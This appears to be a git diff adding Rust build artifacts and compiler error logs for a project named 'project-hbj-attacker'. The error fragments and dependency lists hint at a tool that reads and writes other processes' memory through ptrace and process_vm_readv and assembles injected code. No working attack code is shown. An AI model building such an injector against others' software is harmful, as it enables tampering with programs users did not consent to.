\u001b[0m\u001b[0muse nix::sys::uio::{process_vm_readv, RemoteIoVec};\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9mcould not find `uio` in `sys`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;10mnote\u001b[0m\u001b[0m: found an item that was configured out\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0m/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs:171:13\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m170\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m #![feature = \"uio\"]\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m---------------\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12mthe item is gated behind the `uio` feature\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m171\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m pub mod uio;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;10m^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"cannot find struct, variant or union type `iovec` in this scope","code":{"code":"E0422","explanation":"An identifier that is neither defined nor a struct was used.\n\nErroneous code example:\n\n```compile_fail,E0422\nfn main () {\n let x = Foo { x: 1, y: 2 };\n}\n```\n\nIn this case, `Foo` is undefined, so it inherently isn't anything, and\ndefinitely not a struct.\n\n```compile_fail\nfn main () {\n let foo = 1;\n let x = foo { x: 1, y: 2 };\n}\n```\n\nIn this case, `foo` is defined, but is not a struct, so Rust can't use it as\none.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":1365,"byte_end":1370,"line_start":50,"line_end":50,"column_start":22,"column_end":27,"is_primary":true,"text":[{"text":" let local_iov = [iovec {","highlight_start":22,"highlight_end":27}],"label":"not found in this scope","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0422]\u001b[0m\u001b[0m\u001b[1m: cannot find struct, variant or union type `iovec` in this scope\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:50:22\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m50\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let local_iov = [iovec {\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9mnot found in this scope\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":1419,"byte_end":1423,"line_start":51,"line_end":51,"column_start":47,"column_end":51,"is_primary":true,"text":[{"text":" iov_base: buffer.as_mut_ptr() as *mut libc::c_void,","highlight_start":47,"highlight_end":51}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:51:47\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m51\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m iov_base: buffer.as_mut_ptr() as *mut libc::c_void,\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: could not find `ptrace` in `ptrace`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/main.rs","byte_start":1343,"byte_end":1349,"line_start":49,"line_end":49,"column_start":5,"column_end":11,"is_primary":true,"text":[{"text":" ptrace::detach(pid, None)?;","highlight_start":5,"highlight_end":11}],"label":"could not find `ptrace` in `ptrace`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"consider importing this module","code":null,"level":"help","spans":[{"file_name":"src/main.rs","byte_start":13,"byte_end":13,"line_start":3,"line_end":3,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use nix::sys::ptrace;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::sys::ptrace;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null},{"message":"if you import `ptrace`, refer to it directly","code":null,"level":"help","spans":[{"file_name":"src/main.rs","byte_start":1329,"byte_end":1343,"line_start":47,"line_end":49,"column_start":5,"column_end":5,"is_primary":true,"text":[{"text":" ptrace::","highlight_start":5,"highlight_end":13},{"text":"","highlight_start":1,"highlight_end":1},{"text":" ptrace::detach(pid, None)?;","highlight_start":1,"highlight_end":5}],"label":null,"suggested_replacement":"","suggestion_applicability":"Unspecified","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: could not find `ptrace` in `ptrace`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:49:5\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m49\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m ptrace::detach(pid, None)?;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9mcould not find `ptrace` in `ptrace`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this module\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m3\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::sys::ptrace;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: if \u001b[0m\u001b[0m\u001b[38;5;9myou impo\u001b[0m\u001b[0mrt `ptrace`, refer to it directly\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m47\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;9m- \u001b[0m\u001b[0mptrace::\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m48\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;9m- \u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused variable: `i`","code":{"code":"unused_variables","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1145,"byte_end":1146,"line_start":41,"line_end":41,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_variables)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"if this is intentional, prefix it with an underscore","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":1145,"byte_end":1146,"line_start":41,"line_end":41,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":"_i","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused variable: `i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:41:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m41\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let i = 0;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33mhelp: if this is intentional, prefix it with an underscore: `_i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_variables)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"aborting due to 4 previous errors; 1 warning emitted","code":null,"level":"error","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror\u001b[0m\u001b[0m\u001b[1m: aborting due to 4 previous errors; 1 warning emitted\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"Some errors have detailed explanations: E0422, E0432, E0433.","code":null,"level":"failure-note","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1mSome errors have detailed explanations: E0422, E0432, E0433.\u001b[0m\n"}
+{"$message_type":"diagnostic","message":"For more information about an error, try `rustc --explain E0422`.","code":null,"level":"failure-note","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1mFor more information about an error, try `rustc --explain E0422`.\u001b[0m\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3e048006053403e8/dep-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3e048006053403e8/dep-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..efbe43f
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3e048006053403e8/dep-test-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3e048006053403e8/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3e048006053403e8/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3e048006053403e8/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3e048006053403e8/output-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3e048006053403e8/output-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..7b9e836
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3e048006053403e8/output-test-bin-project-hbj-attacker
@@ -0,0 +1,6 @@
+{"$message_type":"diagnostic","message":"unresolved import `iced_x86::code_asm`","code":{"code":"E0432","explanation":"An import was unresolved.\n\nErroneous code example:\n\n```compile_fail,E0432\nuse something::Foo; // error: unresolved import `something::Foo`.\n```\n\nIn Rust 2015, paths in `use` statements are relative to the crate root. To\nimport items relative to the current and parent modules, use the `self::` and\n`super::` prefixes, respectively.\n\nIn Rust 2018 or later, paths in `use` statements are relative to the current\nmodule unless they begin with the name of a crate or a literal `crate::`, in\nwhich case they start from the crate root. As in Rust 2015 code, the `self::`\nand `super::` prefixes refer to the current and parent modules respectively.\n\nAlso verify that you didn't misspell the import name and that the import exists\nin the module from where you tried to import it. Example:\n\n```\nuse self::something::Foo; // Ok.\n\nmod something {\n pub struct Foo;\n}\n# fn main() {}\n```\n\nIf you tried to use a module from an external crate and are using Rust 2015,\nyou may have missed the `extern crate` declaration (which is usually placed in\nthe crate root):\n\n```edition2015\nextern crate core; // Required to use the `core` crate in Rust 2015.\n\nuse core::any;\n# fn main() {}\n```\n\nSince Rust 2018 the `extern crate` declaration is not required and\nyou can instead just `use` it:\n\n```edition2018\nuse core::any; // No extern crate required in Rust 2018.\n# fn main() {}\n```\n"},"level":"error","spans":[{"file_name":"src/main.rs","byte_start":150,"byte_end":158,"line_start":10,"line_end":10,"column_start":16,"column_end":24,"is_primary":true,"text":[{"text":"use iced_x86::{code_asm::*, Instruction};","highlight_start":16,"highlight_end":24}],"label":"could not find `code_asm` in `iced_x86`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0432]\u001b[0m\u001b[0m\u001b[1m: unresolved import `iced_x86::code_asm`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:10:16\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m10\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0muse iced_x86::{code_asm::*, Instruction};\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9mcould not find `code_asm` in `iced_x86`\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused import: `processes::write_memory_vm`","code":{"code":"unused_imports","explanation":null},"level":"warning","spans":[{"file_name":"src/helper.rs","byte_start":138,"byte_end":164,"line_start":7,"line_end":7,"column_start":9,"column_end":35,"is_primary":true,"text":[{"text":"pub use processes::write_memory_vm;","highlight_start":9,"highlight_end":35}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_imports)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"remove the whole `use` item","code":null,"level":"help","spans":[{"file_name":"src/helper.rs","byte_start":130,"byte_end":166,"line_start":7,"line_end":8,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"pub use processes::write_memory_vm;","highlight_start":1,"highlight_end":36},{"text":"pub use processes::write_memory_ptrace;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"","suggestion_applicability":"MachineApplicable","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused import: `processes::write_memory_vm`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper.rs:7:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m7\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub use processes::write_memory_vm;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^^^^^^^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_imports)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused import: `Instruction`","code":{"code":"unused_imports","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":163,"byte_end":174,"line_start":10,"line_end":10,"column_start":29,"column_end":40,"is_primary":true,"text":[{"text":"use iced_x86::{code_asm::*, Instruction};","highlight_start":29,"highlight_end":40}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"remove the unused import","code":null,"level":"help","spans":[{"file_name":"src/main.rs","byte_start":161,"byte_end":174,"line_start":10,"line_end":10,"column_start":27,"column_end":40,"is_primary":true,"text":[{"text":"use iced_x86::{code_asm::*, Instruction};","highlight_start":27,"highlight_end":40}],"label":null,"suggested_replacement":"","suggestion_applicability":"MachineApplicable","expansion":null},{"file_name":"src/main.rs","byte_start":149,"byte_end":150,"line_start":10,"line_end":10,"column_start":15,"column_end":16,"is_primary":true,"text":[{"text":"use iced_x86::{code_asm::*, Instruction};","highlight_start":15,"highlight_end":16}],"label":null,"suggested_replacement":"","suggestion_applicability":"MachineApplicable","expansion":null},{"file_name":"src/main.rs","byte_start":174,"byte_end":175,"line_start":10,"line_end":10,"column_start":40,"column_end":41,"is_primary":true,"text":[{"text":"use iced_x86::{code_asm::*, Instruction};","highlight_start":40,"highlight_end":41}],"label":null,"suggested_replacement":"","suggestion_applicability":"MachineApplicable","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused import: `Instruction`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:10:29\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m10\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0muse iced_x86::{code_asm::*, Instruction};\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused variable: `i`","code":{"code":"unused_variables","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1235,"byte_end":1236,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_variables)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"if this is intentional, prefix it with an underscore","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":1235,"byte_end":1236,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":"_i","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused variable: `i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:43:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m43\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let i = 0;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33mhelp: if this is intentional, prefix it with an underscore: `_i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_variables)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"aborting due to 1 previous error; 3 warnings emitted","code":null,"level":"error","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror\u001b[0m\u001b[0m\u001b[1m: aborting due to 1 previous error; 3 warnings emitted\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"For more information about this error, try `rustc --explain E0432`.","code":null,"level":"failure-note","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1mFor more information about this error, try `rustc --explain E0432`.\u001b[0m\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3e048006053403e8/test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3e048006053403e8/test-bin-project-hbj-attacker
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3e048006053403e8/test-bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3e048006053403e8/test-bin-project-hbj-attacker.json
new file mode 100644
index 0000000..6b140ef
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3e048006053403e8/test-bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":3316208278650011218,"path":4942398508502643691,"deps":[[3054597201326428407,"iced_x86",false,17829934850101662729],[5150833351789356492,"nix",false,15811409210602710039],[11499138078358568213,"libc",false,1099485397091021021],[17285295483919976612,"dynasmrt",false,3236731772288997544]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-3e048006053403e8/dep-test-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3ec7eac42237cac5/dep-lib-project_hbj_attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3ec7eac42237cac5/dep-lib-project_hbj_attacker
new file mode 100644
index 0000000..024be49
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3ec7eac42237cac5/dep-lib-project_hbj_attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3ec7eac42237cac5/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3ec7eac42237cac5/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3ec7eac42237cac5/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3ec7eac42237cac5/lib-project_hbj_attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3ec7eac42237cac5/lib-project_hbj_attacker
new file mode 100644
index 0000000..59a5cc6
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3ec7eac42237cac5/lib-project_hbj_attacker
@@ -0,0 +1 @@
+b5038e433ae3388a
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3ec7eac42237cac5/lib-project_hbj_attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3ec7eac42237cac5/lib-project_hbj_attacker.json
new file mode 100644
index 0000000..f801ef2
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-3ec7eac42237cac5/lib-project_hbj_attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":1436332732506357817,"profile":8731458305071235362,"path":10763286916239946207,"deps":[[3054597201326428407,"iced_x86",false,16851255346335658477],[5150833351789356492,"nix",false,1524876878938899937],[7883780462905440460,"libloading",false,11840416865595721862],[11499138078358568213,"libc",false,6911773660789407732],[14034831750265444586,"ctor",false,13205310156866713074],[17285295483919976612,"dynasmrt",false,16634940951051159224]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-3ec7eac42237cac5/dep-lib-project_hbj_attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
